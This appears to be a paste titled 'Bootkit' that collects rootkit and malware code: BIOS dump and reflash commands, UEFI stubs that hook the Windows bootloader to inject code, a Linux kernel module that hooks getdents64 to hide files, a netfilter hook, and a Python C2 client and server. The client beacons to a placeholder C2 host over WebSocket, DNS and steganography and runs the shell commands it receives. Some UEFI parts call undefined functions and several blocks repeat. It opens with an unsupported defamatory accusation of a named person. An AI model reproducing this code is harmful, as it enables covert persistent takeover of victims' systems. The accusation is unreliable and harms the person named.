xosski

Bootkit

Mar 29th, 2025
  1. Hunter biden laptop contained CP i will die on this hill
  2. rootkit
  3. #check firmware
  4. sudo dmidecode -t bios
  5. #dump uefi
  6. sudo flashrom -p internal -r bios_backup.bin
  7. #extract modules and for modification
  8. uefi-firmware-parser bios_backup.bin
  9.  
  10.  
  11. #include <efi.h>
  12. #include <efilib.h>
  13.  
  14. EFI_STATUS EFIAPI UefiMain(EFI_HANDLE ImageHandle, EFI_SYSTEM_TABLE *SystemTable) {
  15. InitializeLib(ImageHandle, SystemTable);
  16.  
  17. // Hook Windows Bootloader
  18. CHAR16 *BootLoader = L"\\EFI\\Microsoft\\Boot\\bootmgfw.efi";
  19. SystemTable->BootServices->LoadImage(FALSE, ImageHandle, BootLoader, NULL, 0, NULL);
  20.  
  21. // Inject Code into Kernel
  22. InjectCodeIntoKernel();
  23.  
  24. return EFI_SUCCESS;
  25. }
  26. Bootloader
  27. #include <efi.h>
  28. #include <efilib.h>
  29.  
  30. EFI_STATUS EFIAPI UefiMain(EFI_HANDLE ImageHandle, EFI_SYSTEM_TABLE *SystemTable) {
  31. InitializeLib(ImageHandle, SystemTable);
  32.  
  33. CHAR16 *BootLoader = L"\\EFI\\Microsoft\\Boot\\bootmgfw.efi";
  34. SystemTable->BootServices->LoadImage(FALSE, ImageHandle, BootLoader, NULL, 0, NULL);
  35.  
  36. // Inject malware into kernel memory
  37. InjectCodeIntoKernel();
  38.  
  39. return EFI_SUCCESS;
  40. }
  41. ///////////////////////////////////
  42. Minimal hypervisor
  43. #include <linux/module.h>
  44. #include <linux/kernel.h>
  45. #include <linux/init.h>
  46. #include <asm/io.h>
  47. #include <asm/msr.h>
  48.  
  49. static void enable_vmx(void) {
  50. unsigned long cr4;
  51. asm volatile("mov %%cr4, %0" : "=r" (cr4));
  52. cr4 |= 0x2000; // Set VMX Enable Bit
  53. asm volatile("mov %0, %%cr4" :: "r" (cr4));
  54. }
  55.  
  56. static int __init hypervisor_init(void) {
  57. enable_vmx();
  58. printk(KERN_INFO "Hypervisor Rootkit: VMX Enabled\n");
  59. return 0;
  60. }
  61.  
  62. static void __exit hypervisor_exit(void) {
  63. printk(KERN_INFO "Hypervisor Rootkit: Unloaded\n");
  64. }
  65.  
  66. module_init(hypervisor_init);
  67. module_exit(hypervisor_exit);
  68. MODULE_LICENSE("GPL");
  69. //////////////////////////////////////
  70. hypervisor loading
  71. sudo flashrom -p internal -r bios_backup.bin
  72. uefi-firmware-parser bios_backup.bin
  73.  
  74. EFI_STATUS EFIAPI UefiMain(EFI_HANDLE ImageHandle, EFI_SYSTEM_TABLE *SystemTable) {
  75. InitializeLib(ImageHandle, SystemTable);
  76. CHAR16 *BootLoader = L"\\EFI\\Microsoft\\Boot\\bootmgfw.efi";
  77. SystemTable->BootServices->LoadImage(FALSE, ImageHandle, BootLoader, NULL, 0, NULL);
  78. InjectHypervisor();
  79. return EFI_SUCCESS;
  80. }
  81. sudo flashrom -p internal -w modified_bios.bin
  82. /////////////////////////////////////////////
  83. Hooking system
  84. #include <linux/module.h>
  85. #include <linux/kernel.h>
  86. #include <linux/sched.h>
  87. #include <linux/syscalls.h>
  88.  
  89. unsigned long **sys_call_table;
  90. asmlinkage long (*original_getdents)(unsigned int, struct linux_dirent64 *, unsigned int);
  91.  
  92. asmlinkage long hooked_getdents(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count) {
  93. long ret = original_getdents(fd, dirp, count);
  94. struct linux_dirent64 *d;
  95. int bpos = 0;
  96.  
  97. for (bpos = 0; bpos < ret;) {
  98. d = (struct linux_dirent64 *)((char *)dirp + bpos);
  99. if (strstr(d->d_name, "hidden_process")) {
  100. memmove(d, (char *)d + d->d_reclen, ret - bpos - d->d_reclen);
  101. ret -= d->d_reclen;
  102. } else {
  103. bpos += d->d_reclen;
  104. }
  105. }
  106. return ret;
  107. }
  108.  
  109. static int __init rootkit_init(void) {
  110. sys_call_table = (unsigned long **)kallsyms_lookup_name("sys_call_table");
  111. write_cr0(read_cr0() & (~0x10000));
  112. original_getdents = (void *)sys_call_table[__NR_getdents64];
  113. sys_call_table[__NR_getdents64] = (unsigned long *)hooked_getdents;
  114. write_cr0(read_cr0() | 0x10000);
  115. return 0;
  116. }
  117.  
  118. static void __exit rootkit_exit(void) {
  119. write_cr0(read_cr0() & (~0x10000));
  120. sys_call_table[__NR_getdents64] = (unsigned long *)original_getdents;
  121. write_cr0(read_cr0() | 0x10000);
  122. }
  123. /////////////////////////////////////////////////
  124.  
  125. hooking system calls
  126. #include <linux/module.h>
  127. #include <linux/kernel.h>
  128. #include <linux/sched.h>
  129. #include <linux/syscalls.h>
  130.  
  131. unsigned long **sys_call_table;
  132. asmlinkage long (*original_getdents)(unsigned int, struct linux_dirent64 *, unsigned int);
  133.  
  134. asmlinkage long hooked_getdents(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count) {
  135. long ret = original_getdents(fd, dirp, count);
  136. struct linux_dirent64 *d;
  137. int bpos = 0;
  138.  
  139. for (bpos = 0; bpos < ret;) {
  140. d = (struct linux_dirent64 *)((char *)dirp + bpos);
  141. if (strstr(d->d_name, "hidden_process")) {
  142. memmove(d, (char *)d + d->d_reclen, ret - bpos - d->d_reclen);
  143. ret -= d->d_reclen;
  144. } else {
  145. bpos += d->d_reclen;
  146. }
  147. }
  148. return ret;
  149. }
  150.  
  151. static int __init rootkit_init(void) {
  152. sys_call_table = (unsigned long **)kallsyms_lookup_name("sys_call_table");
  153. write_cr0(read_cr0() & (~0x10000));
  154. original_getdents = (void *)sys_call_table[__NR_getdents64];
  155. sys_call_table[__NR_getdents64] = (unsigned long *)hooked_getdents;
  156. write_cr0(read_cr0() | 0x10000);
  157. return 0;
  158. }
  159.  
  160. static void __exit rootkit_exit(void) {
  161. write_cr0(read_cr0() & (~0x10000));
  162. sys_call_table[__NR_getdents64] = (unsigned long *)original_getdents;
  163. write_cr0(read_cr0() | 0x10000);
  164. }
  165.  
  166. module_init(rootkit_init);
  167. module_exit(rootkit_exit);
  168. MODULE_LICENSE("GPL");
  169. //////////////////////////////////////////
  170. core network hooking
  171. #include <linux/module.h>
  172. #include <linux/kernel.h>
  173. #include <linux/netfilter.h>
  174. #include <linux/netfilter_ipv4.h>
  175. #include <linux/ip.h>
  176. #include <linux/tcp.h>
  177.  
  178. static struct nf_hook_ops netfilter_ops;
  179.  
  180. unsigned int packet_filter(void *priv, struct sk_buff *skb, const struct nf_hook_state *state) {
  181. struct iphdr *ip_header = ip_hdr(skb);
  182. struct tcphdr *tcp_header;
  183.  
  184. if (!ip_header) return NF_ACCEPT;
  185. if (ip_header->protocol == IPPROTO_TCP) {
  186. tcp_header = tcp_hdr(skb);
  187. if (ntohs(tcp_header->dest) == 4444) {
  188. printk(KERN_INFO "Intercepted C2 connection on port 4444\n");
  189. return NF_DROP;
  190. }
  191. }
  192. return NF_ACCEPT;
  193. }
  194.  
  195. static int __init netfilter_init(void) {
  196. netfilter_ops.hook = packet_filter;
  197. netfilter_ops.pf = PF_INET;
  198. netfilter_ops.hooknum = NF_INET_PRE_ROUTING;
  199. netfilter_ops.priority = NF_IP_PRI_FIRST;
  200. nf_register_hook(&netfilter_ops);
  201. return 0;
  202. }
  203.  
  204. static void __exit netfilter_exit(void) {
  205. nf_unregister_hook(&netfilter_ops);
  206. }
  207.  
  208. module_init(netfilter_init);
  209. module_exit(netfilter_exit);
  210. MODULE_LICENSE("GPL");
  211. /////////////////////////////////
  212. c2 client
  213. import websocket
  214. import dns.resolver
  215. import base64
  216. import os
  217. import subprocess
  218. import requests
  219. import json
  220.  
  221. C2_WEBSOCKET = "ws://your-c2-server.com/ws"
  222. DNS_C2_DOMAIN = "c2.yourdns.com"
  223. STEGO_URL = "http://your-c2-server.com/stego/payload.png"
  224.  
  225. def execute_command(cmd):
  226. try:
  227. return subprocess.check_output(cmd, shell=True).decode()
  228. except Exception as e:
  229. return str(e)
  230.  
  231. def beacon_ws():
  232. ws = websocket.WebSocket()
  233. ws.connect(C2_WEBSOCKET)
  234. ws.send(os.getlogin()) # Send unique identifier
  235. while True:
  236. message = ws.recv()
  237. command = json.loads(message).get("cmd", "")
  238. if command:
  239. result = execute_command(command)
  240. ws.send(result)
  241.  
  242. def beacon_dns():
  243. try:
  244. response = dns.resolver.resolve(DNS_C2_DOMAIN, "TXT")
  245. command = base64.b64decode(response[0].to_text().strip('"')).decode()
  246. execute_command(command)
  247. except:
  248. pass
  249.  
  250. def fetch_stego_payload():
  251. response = requests.get(STEGO_URL)
  252. with open("/tmp/stego.png", "wb") as f:
  253. f.write(response.content)
  254.  
  255. def covert_execute():
  256. # Detect best C2 method (WebSocket > DNS > Stego)
  257. try:
  258. beacon_ws()
  259. except:
  260. try:
  261. beacon_dns()
  262. except:
  263. fetch_stego_payload()
  264.  
  265. if __name__ == "__main__":
  266. covert_execute()
  267. //////////////////////////////////////////////
  268. c2 client
  269. from flask import Flask, request, send_file
  270. from flask_sockets import Sockets
  271. import base64
  272. import json
  273. import os
  274. import threading
  275. import dns.resolver
  276.  
  277. app = Flask(__name__)
  278. sockets = Sockets(app)
  279.  
  280. C2_LOGS = "c2_logs.txt"
  281. CONNECTED_AGENTS = {}
  282.  
  283. def log_command(command):
  284. with open(C2_LOGS, "a") as log:
  285. log.write(command + "\n")
  286.  
  287. @sockets.route('/ws')
  288. def handle_ws(ws):
  289. agent_id = ws.receive()
  290. CONNECTED_AGENTS[agent_id] = ws
  291. print(f"[+] Agent Connected: {agent_id}")
  292.  
  293. while not ws.closed:
  294. command = input("C2> ")
  295. if command == "list":
  296. print(CONNECTED_AGENTS.keys())
  297. elif command.startswith("exec"):
  298. _, agent, cmd = command.split(" ", 2)
  299. if agent in CONNECTED_AGENTS:
  300. CONNECTED_AGENTS[agent].send(json.dumps({"cmd": cmd}))
  301. log_command(f"{agent}: {cmd}")
  302. elif command == "exit":
  303. ws.close()
  304.  
  305. @app.route('/dns_c2/<query>')
  306. def dns_c2(query):
  307. """
  308. Encodes C2 commands inside DNS TXT record responses
  309. """
  310. command = get_command_from_dns(query)
  311. return base64.b64encode(command.encode()).decode()
  312.  
  313. def get_command_from_dns(query):
  314. # Example of reading commands via DNS queries
  315. try:
  316. response = dns.resolver.resolve(query, "TXT")
  317. return response[0].to_text().strip('"')
  318. except:
  319. return "sleep"
  320.  
  321. @app.route('/stego/<img_name>')
  322. def stego_payload(img_name):
  323. """
  324. Delivers payloads hidden in image files.
  325. """
  326. return send_file(f"stego_payloads/{img_name}", mimetype='image/png')
  327.  
  328. if __name__ == "__main__":
  329. app.run(host="0.0.0.0", port=5000, threaded=True)